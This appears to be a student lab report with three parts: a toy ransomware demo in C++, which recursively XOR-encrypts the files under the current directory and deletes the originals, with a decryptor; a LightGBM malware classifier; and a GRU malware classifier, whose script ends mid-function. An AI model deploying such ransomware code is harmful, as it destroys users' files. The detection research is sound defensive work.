Lab Report: Malware Detection Research Based on Ransomware, Machine Learning, and Deep Learning

Background

With the rapid development of information technology, computer viruses keep growing in both variety and number, posing a serious challenge to information security. Traditional virus detection relies mainly on signatures and heuristic analysis, which are of limited use against novel and mutated viruses. Machine learning and deep learning, two major branches of modern artificial intelligence, offer new solutions. Malware is a major threat to network security, and ransomware, which encrypts victims' files to extort payment, is among the most damaging. This experiment consists of three parts:

  1. Design a simple ransomware demo to understand the basic behavior of malicious programs.
  2. Detect malicious programs with machine learning.
  3. Detect and classify malicious programs with deep learning.

Part 1: Designing a Ransomware Demo

Objective

Use ChatGPT to implement a simplified ransomware model that simulates the file encryption and decryption workflow, in order to study the behavioral traits of malicious programs.

Technical Implementation
  1. Encryption:
    • Walk every file in the current directory and its subdirectories.
    • Encrypt each file's contents with a simple XOR cipher and append the .exe extension to the encrypted file's name.
    • Delete the original file, keeping only the encrypted copy.
  2. Decryption:
    • Walk the encrypted files and restore the originals with the same XOR logic (XOR with a fixed key is its own inverse; see the sketch after this list).
    • Delete the encrypted files, returning everything to its original state.
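Because x ^ k ^ k == x for any byte x and key k, the encryptor and decryptor can share the same byte loop. A minimal Python sketch of this property (illustrative only, not part of the demo itself):

import io

# XOR with a fixed key is an involution: applying it twice restores the input.
KEY = 0x66

def xor_bytes(data: bytes, key: int = KEY) -> bytes:
    return bytes(b ^ key for b in data)

plaintext = b"hello, world"
ciphertext = xor_bytes(plaintext)            # "encrypt"
assert xor_bytes(ciphertext) == plaintext    # the same call "decrypts"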
Code Logic
  • Directory traversal: recurse through folders with the Windows API.
  • File I/O: read and write through FILE* pointers.
Safety Notes
  • For learning purposes only; any illegal use is forbidden.
  • Confine all operations to a dedicated test folder to avoid accidental data loss.

encode-main.cpp

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "funcs.h"

int main() {
    char buff[MAX_PATH];
    GetCurrentDirectoryA(MAX_PATH, buff);  // start from the current working directory
    findFile(buff);                        // recursively encrypt everything below it
    printf("Oh, ho, you got it\n");
    system("pause");
    return 0;
}

encode-funcs.cpp

#include"funcs.h"
#include<stdio.h>
#include<windows.h>

void findFile(char* pathName) {
char currFile[MAX_PATH]; // 暂时存储每个文件名
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\*.*", pathName);
_WIN32_FIND_DATAA findData;
HANDLE hFile = FindFirstFile(currFile, &findData);
if (hFile == INVALID_HANDLE_VALUE)
return;

int ret = 0;
while (1) {
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\%s", pathName, findData.cFileName);
// 检查文件属性--文件还是文件夹?
if (findData.cFileName[0] == '.'); //对特殊文件夹不进行处理
else if ((findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) //如果是普通文件夹,递归调用findFile函数
findFile(currFile);
else //否则,处理当前文件
enCode(currFile);

ret = FindNextFile(hFile, &findData);
if (!ret)
break;
}
}

void enCode(char* pathFile) {
//打开待加密文件,创建加密后文件
FILE* fpSrc = fopen(pathFile, "rb"); //只读字节流
char buff[MAX_PATH];
sprintf(buff, "%s.exe", pathFile);
FILE* fpDst = fopen(buff, "wb"); //只写字节流

if (fpSrc == NULL || fpDst == NULL)
return;
//以单个字节循环读取待加密文件内容,并写入加密文件中
char currByte;
while (1) {
int count = fread(&currByte, 1, 1, fpSrc);
if (count < 1) //没读到
break;
currByte ^= 0x66; //简单异或加密法
fwrite(&currByte, 1, 1, fpDst); //写入加密文件
}
fclose(fpSrc);
fclose(fpDst);
remove(pathFile); //删除原文件
}

encode-funcs.h

#pragma once
#pragma warning(disable : 4996)

// Recursively visit every file under the given path
void findFile(char* pathName);

// Encrypt a single file
void enCode(char* pathFile);

decode-main.cpp

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include "funcs.h"

int main() {
    char buff[MAX_PATH];
    GetCurrentDirectoryA(MAX_PATH, buff);  // start from the current working directory
    findFile(buff);                        // recursively restore everything below it
    printf("Oh, ho, all files recovered!\n");
    system("pause");
    return 0;
}

decode-funcs.cpp

#include"funcs.h"
#include<stdio.h>
#include<windows.h>

void findFile(char* pathName) {
char currFile[MAX_PATH]; // 暂时存储每个文件名
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\*.*", pathName);
_WIN32_FIND_DATAA findData;
HANDLE hFile = FindFirstFile(currFile, &findData);
if (hFile == INVALID_HANDLE_VALUE)
return;

int ret = 0;
while (1) {
memset(currFile, 0, MAX_PATH);
sprintf(currFile, "%s\\%s", pathName, findData.cFileName);
// 检查文件属性--文件还是文件夹?
if (findData.cFileName[0] == '.'); //对特殊文件夹不进行处理
else if ((findData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) //如果是普通文件夹,递归调用findFile函数
findFile(currFile);
else //否则,处理当前文件(安全起见这里仅打印文件名)
deCode(currFile);

ret = FindNextFile(hFile, &findData);
if (!ret)
break;
}
}

void deCode(char* pathFile) {
//打开待解密文件,创建解密后文件
FILE* fpSrc = fopen(pathFile, "rb"); //只读字节流
char buff[MAX_PATH];
memset(buff, 0, MAX_PATH);
//去掉.exe后缀
if (dropEXE(pathFile, buff) != 0) //如果返回非0,则说明当前文件非.exe结尾,不进行解密处理
return;
FILE* fpDst = fopen(buff, "wb"); //只写字节流
if (fpSrc == NULL || fpDst == NULL)
return;
//以单个字节循环读取待解密文件内容,并写入解密文件中
char currByte;
while (1) {
int count = fread(&currByte, 1, 1, fpSrc);
if (count < 1) //没读到
break;
currByte ^= 0x66; //简单异或解密法
fwrite(&currByte, 1, 1, fpDst); //写入解密文件
}
fclose(fpSrc);
fclose(fpDst);
printf("Congrat! %s recoveried successfully!\n", buff);
remove(pathFile);
}

int dropEXE(char* fpSrc, char* fpDst) {
int n = strlen(fpSrc);
if (n < 4)
return 1;
char check[5];
for (int i = 0; i < 4; ++i)
check[i] = *(fpSrc + n - 4 + i);
check[4] = '\0';
if (strcmp(check, ".exe") != 0) {
printf("sorry, %s is not a .exe file, recovery failed!\n", fpSrc);
return 1;
}
strncpy(fpDst, fpSrc, n - 4);
return 0;
}

decode-funcs.h

#pragma once
#pragma warning(disable : 4996)

// Recursively visit every file under the given path
void findFile(char* pathName);

// Decrypt a single file
void deCode(char* pathFile);
// Strip the ".exe" suffix; returns 0 on success, nonzero otherwise
int dropEXE(char* fpSrc, char* fpDst);

Part 2: Machine-Learning-Based Malware Detection

Malware is software designed to damage a target computer or appropriate its resources; it includes worms, trojans, ransomware, and more. In recent years, with the rise of cryptocurrencies, mining malware has also appeared on a large scale, seriously harming users' interests. Combining machine learning and deep learning can markedly improve detection rates and generalization.

This experiment builds on the malware detection dataset from the Alibaba Cloud Security Malware Detection competition to explore several approaches:

  1. Simulating ransomware behavior.
  2. Machine-learning-based malware detection.
  3. Deep-learning-based malware classification.
Dataset:

Alibaba Cloud Security Malware Detection dataset (Alibaba Cloud dataset)

The dataset, provided by Alibaba Cloud, contains API call sequences of Windows executables collected from sandboxed runs. It totals roughly 600 million records, covering several malware families as well as benign files. Its main characteristics:

1. Data schema
Field         Type    Description
file_id       bigint  File ID
label         bigint  File label: 0 (benign), 1 (ransomware), 2 (cryptominer), 3 (DDoS trojan), 4 (worm), 5 (file infector), 6 (backdoor), 7 (generic trojan)
api           string  Name of the API called by the file
tid           bigint  ID of the thread issuing the call
return_value  string  Return value of the API call
index         string  Order number of the API call; ordered within a thread, with no ordering guarantee across threads
2. Data volume
  • Training data: about 90 million API calls from over 10,000 files (grouped by file ID).
  • Test data: about 80 million API calls from roughly 10,000 files.
  • A single file's API calls may exceed 5,000; anything beyond that has been truncated.
3. Preprocessing
  • All data are desensitized to protect privacy and security.
  • Each record keeps the full call context and thread information, helping models capture behavioral features.
4. Evaluation metric

LogLoss is the evaluation metric (a sanity-check implementation is sketched after the definitions):

$\text{logloss} = -\frac{1}{N} \sum_{i=1}^{N} \sum_{j=1}^{M} \left[ y_{ij} \log(P_{ij}) + (1 - y_{ij}) \log(1 - P_{ij}) \right]$

where:

  • $M$: the number of classes (8 in total, matching labels 0-7).
  • $N$: the number of test-set samples.
  • $y_{ij}$: whether sample $i$ belongs to class $j$ (1 if yes, 0 if no).
  • $P_{ij}$: the predicted probability that sample $i$ belongs to class $j$ (the submitted columns prob0, prob1, ..., prob7).
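The metric can be reproduced directly from this definition. Below is a minimal NumPy sketch with toy data (the helper name is my own); probabilities are clipped to avoid log(0):

import numpy as np

def multiclass_logloss(y_true, y_prob, eps=1e-15):
    """LogLoss exactly as defined above: y_true holds class indices 0..M-1,
    y_prob is an (N, M) array of predicted class probabilities."""
    y_prob = np.clip(y_prob, eps, 1 - eps)     # avoid log(0)
    n, m = y_prob.shape
    y_onehot = np.eye(m)[np.asarray(y_true)]   # (N, M) indicator matrix
    terms = y_onehot * np.log(y_prob) + (1 - y_onehot) * np.log(1 - y_prob)
    return -terms.sum() / n

# Toy example: 3 samples, 8 classes, each row sums to 1
y_true = np.array([0, 5, 7])
y_prob = np.full((3, 8), 0.1)
y_prob[np.arange(3), y_true] = 0.3
print(multiclass_logloss(y_true, y_prob))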
Experiment Method
  1. Feature extraction:
    • Normalize the raw malware records, chiefly the API call sequences and thread information.
    • Encode the API field consistently: a LabelEncoder maps each API name to an integer for the model.
    • Pad or truncate each API call sequence to a fixed length (maximum 5,000).
    • Extract features from the API call text with TF-IDF (a toy example follows this list).
  2. Model training:
    • Feed the TF-IDF features to a LightGBM classifier.
    • TF-IDF uses unigrams and bigrams, capped at 1,000 features.
    • Evaluate with 5-fold cross-validation.
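To make the representation concrete, here is a toy sketch of the same idea the full script below applies at scale: each file's API calls are joined into one "document" and vectorized with 1- and 2-grams. The API names here are hypothetical examples, not taken from the dataset:

from sklearn.feature_extraction.text import TfidfVectorizer

# Hypothetical per-file API "documents": one space-separated string per file
docs = [
    "LoadLibraryA GetProcAddress CreateFileW WriteFile",   # file 1
    "CryptEncrypt CreateFileW WriteFile CryptEncrypt",     # file 2
]

vec = TfidfVectorizer(ngram_range=(1, 2), token_pattern=r'(?u)\b\w+\b')
X = vec.fit_transform(docs)                 # one TF-IDF row per file
print(X.shape)                              # (2, number of 1/2-gram features)
print(vec.get_feature_names_out()[:5])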
Experiment Results
  1. Implementation:
    • Feature extraction: TF-IDF vectorization of the API sequences.
    • Model training: LightGBM for the multi-class task (full script below).
  2. Performance:
    • Mean validation accuracy: 90.24%
    • Per-fold validation accuracy:
      • Fold 1: 90.82%
      • Fold 2: 89.67%
      • Fold 3: 90.49%
      • Fold 4: 89.41%
      • Fold 5: 90.78%
  3. Feature contribution:
    • The TF-IDF features contribute the most, especially high-frequency API combinations; thread-level statistics such as call counts and API distributions also clearly improve classification (a sketch for inspecting the saved importances follows).
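One way to check this claim after training is to average the per-fold importances the script writes to feature_importances.csv. A small sketch, assuming that file's layout (pandas renames the repeated 'feature' columns on read, so the first one is used):

import pandas as pd

# Average the per-fold LightGBM importances and list the strongest features.
fi = pd.read_csv('feature_importances.csv')
imp_cols = [c for c in fi.columns if c.startswith('importance_fold_')]
summary = pd.DataFrame({
    'feature': fi.iloc[:, 0],                     # the first 'feature' column
    'mean_importance': fi[imp_cols].mean(axis=1),
})
print(summary.sort_values('mean_importance', ascending=False).head(20))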
PS D:\chen_hao\病毒检测机器学习> & D:/ProgramSoftware/anaconda3/python.exe d:/chen_hao/病毒检测机器学习/TF-IDF_LightGBM.py
检查GPU状态...
GPU 检查失败,将使用 CPU 模式: module 'lightgbm' has no attribute 'get_gpu_device_count'
读取训练数据...
读取测试数据...
训练数据形状: (89806693, 5)
测试数据形状: (79288375, 4)
准备训练数据...
编码标签...
原始标签分布:
label
5 33033543
0 16375107
7 15081535
2 9693969
3 8117585
6 4586578
1 2254561
4 663815
Name: count, dtype: int64
标签映射:
{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7}
提取基础统计特征...
计算基础聚合特征...
计算API序列特征...
计算线程特征...
提取TF-IDF特征...
准备API序列...
训练TF-IDF向量化器...
开始5折交叉验证训练...

训练折数 1/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.267747
Early stopping, best iteration is:
[103] valid_0's multi_logloss: 0.267092
Fold 1 验证集准确率: 0.9082

训练折数 2/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.315787
Early stopping, best iteration is:
[93] valid_0's multi_logloss: 0.314403
Fold 2 验证集准确率: 0.8967

训练折数 3/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.299846
Early stopping, best iteration is:
[88] valid_0's multi_logloss: 0.298147
Fold 3 验证集准确率: 0.9049

训练折数 4/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.331149
Early stopping, best iteration is:
[83] valid_0's multi_logloss: 0.328906
Fold 4 验证集准确率: 0.8941

训练折数 5/5
Training until validation scores don't improve for 50 rounds
[100] valid_0's multi_logloss: 0.292818
Early stopping, best iteration is:
[95] valid_0's multi_logloss: 0.291777
Fold 5 验证集准确率: 0.9078

平均验证集准确率: 0.9024
生成预测结果...
准备测试数据...
编码标签...
提取基础统计特征...
计算基础聚合特征...
计算API序列特征...
计算线程特征...
提取TF-IDF特征...
准备API序列...
生成预测...
保存预测结果...
完成!
TF-IDF_LightGBM.py
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split, StratifiedKFold
import lightgbm as lgb
import warnings

warnings.filterwarnings('ignore')


def check_gpu():
    """Check whether a GPU is available to LightGBM."""
    try:
        lgb_version = lgb.__version__
        is_gpu_available = lgb.get_gpu_device_count() > 0
        print(f"LightGBM 版本: {lgb_version}")
        print(f"GPU 可用: {is_gpu_available}")
        if is_gpu_available:
            print(f"可用 GPU 数量: {lgb.get_gpu_device_count()}")
    except Exception as e:
        print(f"GPU 检查失败,将使用 CPU 模式: {e}")
        return False
    return is_gpu_available


def optimize_dtypes(df):
    """Downcast numeric columns to reduce memory usage."""
    for col in df.columns:
        if df[col].dtype == 'float64':
            df[col] = df[col].astype('float32')
        elif df[col].dtype == 'int64':
            df[col] = df[col].astype('int32')
    return df


class MalwareClassifier:
    def __init__(self, use_gpu=True):
        self.tfidf = None
        self.models = None
        self.feature_importances = None
        self.use_gpu = use_gpu
        self.label_map = None

    def _encode_labels(self, train_data=None, test_data=None):
        """Map raw labels to consecutive integers."""
        if train_data is not None and 'label' in train_data.columns:
            print("原始标签分布:")
            print(train_data['label'].value_counts())
            unique_labels = sorted(train_data['label'].unique())
            self.label_map = {label: idx for idx, label in enumerate(unique_labels)}
            print("标签映射:")
            print(self.label_map)
            train_data['label'] = train_data['label'].map(self.label_map)

        if test_data is not None and 'label' in test_data.columns:
            test_data['label'] = test_data['label'].map(self.label_map)

        return train_data, test_data

    def prepare_features(self, train_data=None, test_data=None):
        """Build the full feature matrix (statistics + TF-IDF)."""
        print("编码标签...")
        train_data, test_data = self._encode_labels(train_data, test_data)

        if train_data is not None:
            print("提取基础统计特征...")
            train_stats = self._extract_basic_stats(train_data)
            print("提取TF-IDF特征...")
            if test_data is not None:
                train_tfidf, test_tfidf = self._extract_tfidf_features(train_data, test_data)
                test_stats = self._extract_basic_stats(test_data)
                train_features = pd.merge(train_stats, train_tfidf, on='file_id')
                test_features = pd.merge(test_stats, test_tfidf, on='file_id')
                return train_features, test_features
            else:
                train_tfidf = self._extract_tfidf_features(train_data)
                return pd.merge(train_stats, train_tfidf, on='file_id')
        elif test_data is not None:
            print("提取基础统计特征...")
            test_stats = self._extract_basic_stats(test_data)
            print("提取TF-IDF特征...")
            test_tfidf = self._extract_tfidf_features(test_data)
            return pd.merge(test_stats, test_tfidf, on='file_id')

    def _extract_basic_stats(self, data):
        """Per-file aggregate statistics over the API call records."""
        if 'label' in data.columns:
            df = data.groupby('file_id')['label'].first().reset_index()
        else:
            df = pd.DataFrame({'file_id': data['file_id'].unique()})

        print("计算基础聚合特征...")
        agg_features = data.groupby('file_id').agg({
            'api': ['count', 'nunique'],
            'tid': 'nunique',
            'index': ['min', 'max', 'mean', 'std']
        }).reset_index()
        agg_features.columns = ['file_id', 'api_calls', 'unique_apis',
                                'thread_count', 'min_index', 'max_index',
                                'mean_index', 'std_index']

        df = pd.merge(df, agg_features, on='file_id', how='left')

        print("计算API序列特征...")
        api_counts = data.groupby(['file_id', 'api']).size().reset_index(name='api_freq')
        top_apis = api_counts.groupby('file_id')['api_freq'].agg(['max', 'mean']).reset_index()
        top_apis.columns = ['file_id', 'max_api_freq', 'mean_api_freq']

        df = pd.merge(df, top_apis, on='file_id', how='left')

        print("计算线程特征...")
        thread_stats = data.groupby(['file_id', 'tid']).size().reset_index(name='apis_per_thread')
        thread_agg = thread_stats.groupby('file_id')['apis_per_thread'].agg(['mean', 'std', 'max']).reset_index()
        thread_agg.columns = ['file_id', 'mean_apis_per_thread', 'std_apis_per_thread', 'max_apis_per_thread']

        df = pd.merge(df, thread_agg, on='file_id', how='left')

        df['unique_api_ratio'] = df['unique_apis'] / (df['api_calls'] + 1)
        df['api_per_thread_ratio'] = df['api_calls'] / (df['thread_count'] + 1)

        df = df.fillna(0)
        return df

    def _extract_tfidf_features(self, train_data, test_data=None):
        def prepare_api_sequence(data):
            # Join each file's API names into one whitespace-separated "document"
            return data.groupby('file_id').agg({
                'api': lambda x: ' '.join(x.astype(str))
            }).reset_index().rename(columns={'api': 'api_sequence'})

        print("准备API序列...")
        train_sequences = prepare_api_sequence(train_data)

        if self.tfidf is None:
            print("训练TF-IDF向量化器...")
            self.tfidf = TfidfVectorizer(
                max_features=1000,
                ngram_range=(1, 2),
                min_df=5,
                dtype=np.float32,
                token_pattern=r'(?u)\b\w+\b'
            )
            tfidf_features = self.tfidf.fit_transform(train_sequences['api_sequence'])
        else:
            tfidf_features = self.tfidf.transform(train_sequences['api_sequence'])

        feature_names = [f'tfidf_{i}' for i in range(tfidf_features.shape[1])]
        tfidf_df = pd.DataFrame(
            tfidf_features.toarray(),
            columns=feature_names,
            dtype=np.float32
        )
        tfidf_df['file_id'] = train_sequences['file_id'].values

        if test_data is not None:
            print("处理测试数据TF-IDF特征...")
            test_sequences = prepare_api_sequence(test_data)
            test_features = self.tfidf.transform(test_sequences['api_sequence'])
            test_tfidf_df = pd.DataFrame(
                test_features.toarray(),
                columns=feature_names,
                dtype=np.float32
            )
            test_tfidf_df['file_id'] = test_sequences['file_id'].values
            return tfidf_df, test_tfidf_df

        return tfidf_df

    def train(self, train_data, n_folds=5):
        print("准备训练数据...")
        train_features = self.prepare_features(train_data)

        X = train_features.drop(['file_id', 'label'], axis=1)
        y = train_features['label']

        num_classes = len(y.unique())

        params = {
            'objective': 'multiclass',
            'num_class': num_classes,
            'metric': 'multi_logloss',
            'boosting_type': 'gbdt',
            'num_leaves': 31,
            'learning_rate': 0.05,
            'feature_fraction': 0.9,
            'bagging_fraction': 0.8,
            'bagging_freq': 5,
            'verbose': -1,
            'max_bin': 63,
            'min_data_in_leaf': 50,
            'num_threads': 8
        }

        if self.use_gpu:
            gpu_params = {
                'device': 'gpu',
                'gpu_platform_id': 0,
                'gpu_device_id': 0,
                'device_type': 'cuda',
                'tree_learner': 'feature'
            }
            params.update(gpu_params)

        kf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=42)
        self.models = []
        self.feature_importances = pd.DataFrame()
        validation_accuracies = []

        print(f"开始{n_folds}折交叉验证训练...")
        for fold, (train_idx, val_idx) in enumerate(kf.split(X, y), 1):
            print(f"\n训练折数 {fold}/{n_folds}")
            X_train, X_val = X.iloc[train_idx], X.iloc[val_idx]
            y_train, y_val = y.iloc[train_idx], y.iloc[val_idx]

            train_set = lgb.Dataset(X_train, y_train)
            valid_set = lgb.Dataset(X_val, y_val, reference=train_set)

            model = lgb.train(
                params,
                train_set,
                num_boost_round=1000,
                valid_sets=[valid_set],
                callbacks=[
                    lgb.early_stopping(50),
                    lgb.log_evaluation(100)
                ]
            )

            self.models.append(model)

            fold_importance = pd.DataFrame({
                'feature': X.columns,
                f'importance_fold_{fold}': model.feature_importance()
            })
            self.feature_importances = pd.concat([
                self.feature_importances,
                fold_importance
            ], axis=1)

            val_preds = model.predict(X_val)
            val_preds = np.argmax(val_preds, axis=1)
            val_accuracy = accuracy_score(y_val, val_preds)
            validation_accuracies.append(val_accuracy)
            print(f"Fold {fold} 验证集准确率: {val_accuracy:.4f}")

        mean_accuracy = np.mean(validation_accuracies)
        print(f"\n平均验证集准确率: {mean_accuracy:.4f}")

    def predict(self, test_data):
        print("准备测试数据...")
        test_features = self.prepare_features(test_data=test_data)

        print("生成预测...")
        X_test = test_features.drop(['file_id'], axis=1)

        # Average the predicted probabilities of the fold models
        predictions = np.zeros((len(X_test), len(self.label_map)), dtype=np.float32)
        for model in self.models:
            predictions += model.predict(X_test)
        predictions /= len(self.models)

        submission = pd.DataFrame({
            'file_id': test_features['file_id']
        })

        for i, label in enumerate(sorted(self.label_map.keys())):
            submission[f'prob_{label}'] = predictions[:, i]

        return submission


def load_data_in_chunks(train_path, test_path, chunk_size=1000000):
    print("读取训练数据...")
    train_chunks = pd.read_csv(train_path, chunksize=chunk_size)
    train_data = pd.concat(train_chunks)

    print("读取测试数据...")
    test_chunks = pd.read_csv(test_path, chunksize=chunk_size)
    test_data = pd.concat(test_chunks)

    train_data = optimize_dtypes(train_data)
    test_data = optimize_dtypes(test_data)

    print(f"训练数据形状: {train_data.shape}")
    print(f"测试数据形状: {test_data.shape}")

    return train_data, test_data


def main():
    print("检查GPU状态...")
    gpu_available = check_gpu()

    try:
        train_data, test_data = load_data_in_chunks(
            'input/train.csv',
            'input/test.csv'
        )

        classifier = MalwareClassifier(use_gpu=gpu_available)

        classifier.train(train_data, n_folds=5)

        print("生成预测结果...")
        submission = classifier.predict(test_data)

        print("保存预测结果...")
        submission.to_csv('submission.csv', index=False)

        if classifier.feature_importances is not None:
            classifier.feature_importances.to_csv('feature_importances.csv', index=False)

        print("完成!")

    except Exception as e:
        print(f"发生错误: {str(e)}")
        import traceback
        traceback.print_exc()


if __name__ == "__main__":
    main()

  4. Results preview (first rows of submission.csv):
file_id,prob_0,prob_1,prob_2,prob_3,prob_4,prob_5,prob_6,prob_7
1,0.0024434612,0.00034864913,0.9696685,0.0078575,0.00039957318,0.002738173,0.0044820085,0.012062186
2,0.7480677,0.0013819844,0.0049213427,0.003764731,0.0005452622,0.045439627,0.017060611,0.17881876
3,0.99866915,2.787807e-05,0.00014846055,0.00011570427,5.9706535e-06,0.00043032583,6.843034e-05,0.00053410063
4,0.051594943,0.0038525928,0.035013992,0.065091416,0.0038617428,0.044863444,0.22614911,0.5695728
5,0.9948373,0.00013502031,0.0009673423,0.0006626427,2.3118486e-05,0.0015179071,0.00018578261,0.0016709866
6,0.002266401,0.00025418383,0.006541302,0.0007698187,3.052294e-05,0.98704815,0.00070866174,0.0023810265
7,0.0043757814,0.00055977836,0.0015399179,0.70781934,0.002132857,0.025764057,0.0015818799,0.2562264
8,0.93392134,0.0009572902,0.0076661445,0.0061014136,0.00012724655,0.016519673,0.003812942,0.030893898
9,0.85189515,0.0010084683,0.0036384996,0.0051778518,0.00022519422,0.07421501,0.014758055,0.04908181
10,0.37684268,0.006323976,0.20794848,0.0114947595,0.00050486217,0.12723994,0.03782148,0.23182385
11,0.0064604813,0.0006989088,0.0032121348,0.0008223769,5.8260433e-05,0.9772016,0.0031507823,0.008395462
12,0.9656893,0.0048273774,0.009747942,0.001571597,4.1226842e-05,0.0074556046,0.000666464,0.010000597
13,0.9976041,5.375104e-05,0.00030956598,0.00024548933,1.8375762e-05,0.0011245721,9.734804e-05,0.00054680154
14,0.9703827,0.00031270864,0.01056415,0.008323639,0.00010526275,0.0041897697,0.00083469774,0.0052871224
15,0.9724293,0.0001765955,0.020143056,0.0005281937,5.2647345e-05,0.0018647272,0.00078569603,0.004019852
16,0.99562645,7.9901416e-05,0.00037493333,0.00046305108,1.6109376e-05,0.0015119539,0.00081107346,0.0011165042
17,0.001069112,0.00026497667,0.004910701,0.0060763317,0.00013840488,0.96927947,0.0017614173,0.016499612
18,0.986684,0.00047525796,0.0021059073,0.0008186839,3.3282307e-05,0.004973329,0.0010258693,0.0038835872
19,0.9890321,0.00015959739,0.002707534,0.0009250467,5.465704e-05,0.0030247762,0.00037867084,0.0037176465
Part 3: Deep-Learning-Based Malware Detection and Classification

Experiment Method
  1. Features:
    • The API call sequences are used directly as model input.
  2. Model architecture:
    • A deep model built around a bidirectional GRU.
    • An embedding layer turns the API sequence into vectors, the bidirectional GRU captures the temporal structure, and a fully connected layer produces the class scores.
  3. Training and validation:
    • Cross-entropy loss with the Adam optimizer.
    • The checkpoint with the lowest validation loss is kept.

Experiment Results
  1. Implementation:
    • The model is implemented in PyTorch (full script below).
  2. Performance:
    • Final validation accuracy: 83.66%.
    • The model converges steadily over 20 epochs; training accuracy climbs from an initial 42.72% to 84.67%.
    • Validation loss drops markedly, indicating good generalization.
RNN.py
import os
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from tqdm import tqdm

# Fix the random seeds and pick the device
SEED = 42
np.random.seed(SEED)
torch.manual_seed(SEED)
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print(f"Using device: {DEVICE}")

# Load the data
train_data = pd.read_csv('input/train.csv')
test_data = pd.read_csv('input/test.csv')

# Encode API names as integers
# (note: LabelEncoder assigns id 0 to a real API, which also serves as the
# padding value below, so those two are conflated)
apis = list(set(list(train_data.api.unique()) + list(test_data.api.unique())))
enc = LabelEncoder().fit(apis)
train_data['enc'] = enc.transform(train_data.api)
test_data['enc'] = enc.transform(test_data.api)

# Aggregate the API sequence of each file
tr = train_data.groupby('file_id').enc.apply(list).reset_index()
te = test_data.groupby('file_id').enc.apply(list).reset_index()

# Extract the labels
label = train_data.groupby('file_id')['label'].agg('first').reset_index()
num_classes = label.label.nunique()
label_encoder = LabelEncoder()
label['label'] = label_encoder.fit_transform(label['label'])

# Pad or truncate each sequence to a fixed length
MAX_SEQ_LEN = 5000
tr['enc'] = tr['enc'].apply(lambda x: x[:MAX_SEQ_LEN] if len(x) > MAX_SEQ_LEN else x + [0] * (MAX_SEQ_LEN - len(x)))
te['enc'] = te['enc'].apply(lambda x: x[:MAX_SEQ_LEN] if len(x) > MAX_SEQ_LEN else x + [0] * (MAX_SEQ_LEN - len(x)))

# Wrap the sequences as a PyTorch Dataset
class VirusDataset(Dataset):
    def __init__(self, sequences, labels=None):
        self.sequences = torch.tensor(sequences, dtype=torch.long)
        self.labels = torch.tensor(labels, dtype=torch.long) if labels is not None else None

    def __len__(self):
        return len(self.sequences)

    def __getitem__(self, idx):
        if self.labels is not None:
            return self.sequences[idx], self.labels[idx]
        else:
            return self.sequences[idx]

# Build the datasets
X_train, X_val, y_train, y_val = train_test_split(tr['enc'].tolist(), label['label'].tolist(), test_size=0.2, random_state=SEED)
train_dataset = VirusDataset(X_train, y_train)
val_dataset = VirusDataset(X_val, y_val)
test_dataset = VirusDataset(te['enc'].tolist())

# Data loaders
BATCH_SIZE = 256
train_loader = DataLoader(train_dataset, batch_size=BATCH_SIZE, shuffle=True)
val_loader = DataLoader(val_dataset, batch_size=BATCH_SIZE, shuffle=False)
test_loader = DataLoader(test_dataset, batch_size=BATCH_SIZE, shuffle=False)

# Model definition
class GRUModel(nn.Module):
    def __init__(self, vocab_size, embed_dim, hidden_dim, num_classes):
        super(GRUModel, self).__init__()
        self.embedding = nn.Embedding(vocab_size, embed_dim, padding_idx=0)
        self.gru = nn.GRU(embed_dim, hidden_dim, batch_first=True, bidirectional=True)
        self.fc = nn.Linear(hidden_dim * 2, num_classes)
        self.dropout = nn.Dropout(0.3)

    def forward(self, x):
        x = self.embedding(x)  # (batch_size, seq_len, embed_dim)
        x, _ = self.gru(x)     # (batch_size, seq_len, hidden_dim * 2)
        x = x[:, -1, :]        # output at the last time step (batch_size, hidden_dim * 2);
                               # note this position is padding for short sequences
        x = self.dropout(x)
        x = self.fc(x)         # (batch_size, num_classes)
        return x

# Hyperparameters
VOCAB_SIZE = len(apis) + 1
EMBED_DIM = 50
HIDDEN_DIM = 128
NUM_CLASSES = num_classes
LR = 0.001
EPOCHS = 20

# Model, loss function, and optimizer
model = GRUModel(VOCAB_SIZE, EMBED_DIM, HIDDEN_DIM, NUM_CLASSES).to(DEVICE)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=LR)

# If a trained checkpoint already exists, load it instead of retraining
MODEL_PATH = 'best_gru_model.pth'
if os.path.exists(MODEL_PATH):
    print(f"检测到已有模型文件 {MODEL_PATH},直接加载模型进行预测...")
    model.load_state_dict(torch.load(MODEL_PATH))
else:
    # Training and validation loops
    def train_epoch(model, dataloader, criterion, optimizer):
        model.train()
        epoch_loss, correct, total = 0, 0, 0
        for sequences, labels in tqdm(dataloader, desc="Training"):
            sequences, labels = sequences.to(DEVICE), labels.to(DEVICE)
            optimizer.zero_grad()
            outputs = model(sequences)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            epoch_loss += loss.item() * sequences.size(0)
            preds = outputs.argmax(dim=1)
            correct += (preds == labels).sum().item()
            total += labels.size(0)
        return epoch_loss / total, correct / total

    def validate_epoch(model, dataloader, criterion):
        model.eval()
        epoch_loss, correct, total = 0, 0, 0
        with torch.no_grad():
            for sequences, labels in tqdm(dataloader, desc="Validation"):
                sequences, labels = sequences.to(DEVICE), labels.to(DEVICE)
                outputs = model(sequences)
                loss = criterion(outputs, labels)
                epoch_loss += loss.item() * sequences.size(0)
                preds = outputs.argmax(dim=1)
                correct += (preds == labels).sum().item()
